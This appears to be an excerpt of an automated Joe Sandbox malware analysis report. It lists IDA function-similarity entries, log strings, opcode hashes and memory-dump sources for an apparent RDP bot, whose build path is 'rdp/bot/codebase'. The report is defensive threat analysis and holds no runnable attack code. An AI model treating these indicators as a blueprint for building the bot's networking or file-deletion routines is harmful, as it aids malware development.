                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                                                                  • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
                                                                                                                                                  • API String ID: 2018770650-4119452840
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsend
                                                                                                                                                  • String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
                                                                                                                                                  • API String ID: 1802528911-690514478
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsend
                                                                                                                                                  • String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
                                                                                                                                                  • API String ID: 1802528911-690514478
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                                                  • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                                                                                                                  • API String ID: 1729277954-887953274
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                                                  • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                                                                                                                  • API String ID: 1729277954-887953274
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                                                  • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                                                                                                                  • API String ID: 1729277954-887953274
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                                                  • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                                                                                                                  • API String ID: 1729277954-887953274
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                                                  • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                                                                                                                  • API String ID: 1729277954-887953274
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                                                  • String ID: [E] (%s) -> setsockopt(SO_RCVTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$[E] (%s) -> setsockopt(SO_SNDTIMEO) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_timeo
                                                                                                                                                  • API String ID: 1729277954-887953274
                                                                                                                                                  • Opcode ID: a09ac9daefed23991da653184c4f8eb038bf2771e315a903420f93c20336098a
                                                                                                                                                  • Instruction ID: 7631d90fcac33f23cd3ebdb359f02effd0c428c7ab7b2395ecefb8411b1ac45d
                                                                                                                                                  • Opcode Fuzzy Hash: a09ac9daefed23991da653184c4f8eb038bf2771e315a903420f93c20336098a
                                                                                                                                                  • Instruction Fuzzy Hash: 6A113071A1854286E724AFADF8045B5A760FF887D4F108235EB6D837A5DF7CD509CB00
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  • [D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s)), xrefs: 00007FF8BFB3631F
                                                                                                                                                  • routine_tx, xrefs: 00007FF8BFB36318
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$EnterHeapLeave$FreeProcess
                                                                                                                                                  • String ID: [D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
                                                                                                                                                  • API String ID: 2539320189-3555278722
                                                                                                                                                  • Opcode ID: a997a4d3c2cc867a1520977a3d56c0cbdd638971f55bc1ea485832968568b02c
                                                                                                                                                  • Instruction ID: 43d79b9ae4c1c0d72b49ce5039e6fd89cca013d3480998f3a41414150c6764d1
                                                                                                                                                  • Opcode Fuzzy Hash: a997a4d3c2cc867a1520977a3d56c0cbdd638971f55bc1ea485832968568b02c
                                                                                                                                                  • Instruction Fuzzy Hash: 0C311831A88A4382EB249F99E990639B3A1FB44FC0F188039DB9D43B64CF3CE440C340
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                                  • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                                                                                                                                  • API String ID: 1799206407-1112464793
                                                                                                                                                  • Opcode ID: 4c9deac3ad3846ce87ba50fd85f43f8bfee23200bc165dcce4c80e2aa1f1ac2a
                                                                                                                                                  • Instruction ID: 948a3ff881a8f2a023ae0b88c23490ac705fc43c1ad052e35497abcbcfa2b9a2
                                                                                                                                                  • Opcode Fuzzy Hash: 4c9deac3ad3846ce87ba50fd85f43f8bfee23200bc165dcce4c80e2aa1f1ac2a
                                                                                                                                                  • Instruction Fuzzy Hash: AE21C290E0D48782FB70965CA584B7CA161EF78319F245A33F34EDE5E4DE2CECA59202
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                                  • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                                                                                                                                  • API String ID: 1799206407-1112464793
                                                                                                                                                  • Opcode ID: 7c20dbad54cca28f09c7073d6860dd97cea1816a0499d71971a91a429b17aa21
                                                                                                                                                  • Instruction ID: f0527dcbe95aa48de0caaef305bad273a13541f830c6d85b2cf8a9d270ce605f
                                                                                                                                                  • Opcode Fuzzy Hash: 7c20dbad54cca28f09c7073d6860dd97cea1816a0499d71971a91a429b17aa21
                                                                                                                                                  • Instruction Fuzzy Hash: D821B750E0C0C382FB30475CA99437CA296AF11399F3465B6DF4E8A1E0DE3EED859606
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                                  • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
                                                                                                                                                  • API String ID: 1799206407-1112464793
                                                                                                                                                  • Opcode ID: 246f99be2f9a7613f0f970f80b26d1d377dd2a132c685df6de0c815cf2380339
                                                                                                                                                  • Instruction ID: f9da6b9d9c7af8cf84f521e8a18c8c8a8e9b3a49838fd0b9bd05707847679c76
                                                                                                                                                  • Opcode Fuzzy Hash: 246f99be2f9a7613f0f970f80b26d1d377dd2a132c685df6de0c815cf2380339
                                                                                                                                                  • Instruction Fuzzy Hash: 7421AF50E0C18382FB6446DDA48437C5388AF8039EF744572E74ECA6D6DE2DEEC6D252
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastrecv
                                                                                                                                                  • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                                                                                                                  • API String ID: 2514157807-65069805
                                                                                                                                                  • Opcode ID: 687b881fdd348855cd9be93875ebccf1f6286ced463390f6bf4ec4fd153eb7a4
                                                                                                                                                  • Instruction ID: 7336100debd541d3922b031fdae6a1d125ee41bd22867362ddc48195d4bd92b0
                                                                                                                                                  • Opcode Fuzzy Hash: 687b881fdd348855cd9be93875ebccf1f6286ced463390f6bf4ec4fd153eb7a4
                                                                                                                                                  • Instruction Fuzzy Hash: 88118F60E1C95391F630535CAC812B51240BF427F4F4163B2DF2D962E6DE5DAA469300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastrecv
                                                                                                                                                  • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                                                                                                                  • API String ID: 2514157807-65069805
                                                                                                                                                  • Opcode ID: 71b248d79f63e3ad16b9781f2f0d4f3c64fd26030b2f447712807f0f8b8b6e07
                                                                                                                                                  • Instruction ID: 54a49b6cc683f7c40f87477be9d2cc4f61832e5d9d7b78cc60b8f4c376eb720c
                                                                                                                                                  • Opcode Fuzzy Hash: 71b248d79f63e3ad16b9781f2f0d4f3c64fd26030b2f447712807f0f8b8b6e07
                                                                                                                                                  • Instruction Fuzzy Hash: 41118251E0C69755F9105F1CA8806B82751AF407F4FA24370DE2D8A5E3FE2CA947B300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastrecv
                                                                                                                                                  • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                                                                                                                  • API String ID: 2514157807-65069805
                                                                                                                                                  • Opcode ID: e17e57d39b6d0bf0619066593cd494d760b0a37cd43b7cfbc4e2e11104ea388d
                                                                                                                                                  • Instruction ID: 8612ae7a319476ee1dd1359d32faf91321d0e089fa5f2a727600c1cc5392ec67
                                                                                                                                                  • Opcode Fuzzy Hash: e17e57d39b6d0bf0619066593cd494d760b0a37cd43b7cfbc4e2e11104ea388d
                                                                                                                                                  • Instruction Fuzzy Hash: B6115E58E0E61751FA245BACE8612B873516F457F0F504330DF2D9AEE2DE2CF9568700
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastrecv
                                                                                                                                                  • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                                                                                                                  • API String ID: 2514157807-65069805
                                                                                                                                                  • Opcode ID: 5924ac5f7febb98cc3b4509505359a6d1b94a50e864779fcb44e8b3ea3085f99
                                                                                                                                                  • Instruction ID: 20d984077ef3eb03a3a6079a1c0af6bafcdd2890f8a2787845fe3d5738dc759c
                                                                                                                                                  • Opcode Fuzzy Hash: 5924ac5f7febb98cc3b4509505359a6d1b94a50e864779fcb44e8b3ea3085f99
                                                                                                                                                  • Instruction Fuzzy Hash: 1F11A350ECC51741FA14A7ACAD802781358AF407F4FA01331DF3DABAE5DE1CA946D300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastrecv
                                                                                                                                                  • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                                                                                                                  • API String ID: 2514157807-65069805
                                                                                                                                                  • Opcode ID: 7da5c75f58549cb25f1cac0269867dfb19bddbe817eba6ea8d5b83fe769abe86
                                                                                                                                                  • Instruction ID: 733571e87d911fb63e6a8d039384a8577a09b5653d95f4aebb2b4d5b36266879
                                                                                                                                                  • Opcode Fuzzy Hash: 7da5c75f58549cb25f1cac0269867dfb19bddbe817eba6ea8d5b83fe769abe86
                                                                                                                                                  • Instruction Fuzzy Hash: 94110D50A0C51BC1F925A7ADEC406B42751AF857E4F619331EB2D9AAE6DE1CA546C300
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryA.KERNEL32(?,?,service,000002234F5413D0,00007FF6BE039404), ref: 00007FF6BE0316A2
                                                                                                                                                  • GetLastError.KERNEL32(?,?,service,000002234F5413D0,00007FF6BE039404), ref: 00007FF6BE0316CE
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load$service
                                                                                                                                                  • API String ID: 4085810780-4145076245
                                                                                                                                                  • Opcode ID: 1a562aef5cc623c6b3c41f53663e287007a7854ec2e1844506a1c76ec2df1022
                                                                                                                                                  • Instruction ID: 55df885a54286c5a676c48a863fdd030cf9eed3c66ce72c2b590972b31cf19d7
                                                                                                                                                  • Opcode Fuzzy Hash: 1a562aef5cc623c6b3c41f53663e287007a7854ec2e1844506a1c76ec2df1022
                                                                                                                                                  • Instruction Fuzzy Hash: 2DF0BE10F4A60741ED20A79EAA508B42670AF3CBC0F880033FF0DA6356ED2CA5A6C300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Startupfflushfwrite
                                                                                                                                                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                                                                                                                  • API String ID: 3771387389-898331216
                                                                                                                                                  • Opcode ID: 9adf5fa366108badb66f3825d14c001fe3316979c7670eb6608d00b3c87b209d
                                                                                                                                                  • Instruction ID: f2e504a9af7b1f45e7f43f27f5a04f7fda0403907d79d3095dff79d8e551c65d
                                                                                                                                                  • Opcode Fuzzy Hash: 9adf5fa366108badb66f3825d14c001fe3316979c7670eb6608d00b3c87b209d
                                                                                                                                                  • Instruction Fuzzy Hash: 88F06D71B0C402D1FB219B9CEC843F52310AF163D4F8415B6DF0D461A6EF5EE6498300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Startupfflushfwrite
                                                                                                                                                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                                                                                                                  • API String ID: 3771387389-898331216
                                                                                                                                                  • Opcode ID: 91b5b12ed51ae55352934baa0b39f4641da89fbc1b278aeeed348b83f169e717
                                                                                                                                                  • Instruction ID: c19971c05cbf812be55a9f138efdf6a74e98d668463b3de981aef0ba04bf7787
                                                                                                                                                  • Opcode Fuzzy Hash: 91b5b12ed51ae55352934baa0b39f4641da89fbc1b278aeeed348b83f169e717
                                                                                                                                                  • Instruction Fuzzy Hash: 56F09061F0848391FB139F1CE9403F52311AF143C8F458432DA8D961D6EE5DF548E700
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Startupfflushfwrite
                                                                                                                                                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                                                                                                                  • API String ID: 3771387389-898331216
                                                                                                                                                  • Opcode ID: a26de81fc8445dc42c5ba4472ba58619277b91e3ccb05bf8742dbed8f743adb0
                                                                                                                                                  • Instruction ID: 63214778dc4ae82594cbb90f9f7f2f58423604ba7d17166605554c248d60c0b4
                                                                                                                                                  • Opcode Fuzzy Hash: a26de81fc8445dc42c5ba4472ba58619277b91e3ccb05bf8742dbed8f743adb0
                                                                                                                                                  • Instruction Fuzzy Hash: 21F01D62F1848391FB15DF1DE8857F56312EF107C4F858872DA0D866A6FE2CE54AB300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Startupfflushfwrite
                                                                                                                                                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Startupfflushfwrite
                                                                                                                                                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                                                                                                                  APIs
